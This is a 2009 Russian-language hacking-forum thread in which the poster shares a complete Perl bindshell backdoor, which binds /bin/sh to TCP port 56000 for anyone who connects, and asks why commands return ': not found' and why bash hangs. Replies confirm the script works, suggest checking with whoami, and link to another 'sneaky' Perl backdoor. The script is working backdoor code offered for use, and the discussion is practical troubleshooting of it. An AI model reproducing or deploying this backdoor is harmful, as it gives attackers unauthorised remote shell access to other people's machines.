Нюансы в perl bindshells

Discussion in 'Безопасность и Анонимность' started by Snake Plissken, 20 Dec 2009.

  1. Snake Plissken

    Snake Plissken New Member

    Joined:
    7 Jul 2008
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Столкнулся с таким вот явлением. В perl биндшеллах когда подключаешься и отправляешь команды, то тебе возвращается ": not found". И после каждой команды приходится точку с запятой лепить. Кроме того, когда пробую привязать bash в биндшелле, то при подключении он просто подвисает и ничего не происходит. Кто с этим встречался и как это решить?

    Вот код среднестатистического бэкдора на перл

    Code:
    #!/usr/bin/perl
      #bindshell.pl
      #Usage: perl bindshell.pl &
      use Socket;
      $p=56000;
      socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')  );
      setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
      bind(S,sockaddr_in($p,INADDR_ANY));
      listen(S,50);
      while(1)
      {
      accept(X,S);
      if(!($pid=fork)){
      if(!defined $pid){exit(0);}
      open STDIN,"<&X";
      open STDOUT,">&X";
      open STDERR,">&X";
      exec("/bin/sh -i");
      close X;
      }
      }
    
     
  2. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    этот нормально работает у меня
     
  3. ghostwizard

    ghostwizard Member

    Joined:
    4 Dec 2005
    Messages:
    127
    Likes Received:
    36
    Reputations:
    21
    Все работает. Да, он не выводит PS1, но работает. Проверить можно через whoami.

    Вот готовый хитрый бэкдор на перле:
    _http://rawlab.mindcreations.com/codes/perl-backdoor.pl
     
  4. Snake Plissken

    Snake Plissken New Member

    Joined:
    7 Jul 2008
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Он работает, только чтобы команды выполнялись, нужно после каждой ставить ";", иначе выдает ": not found". А вот если exec("/bin/bash -i"); прописать то при коннектре биндшелл просто морозится и никак не реагирует. Проверял на последней убунте.
     
Loading...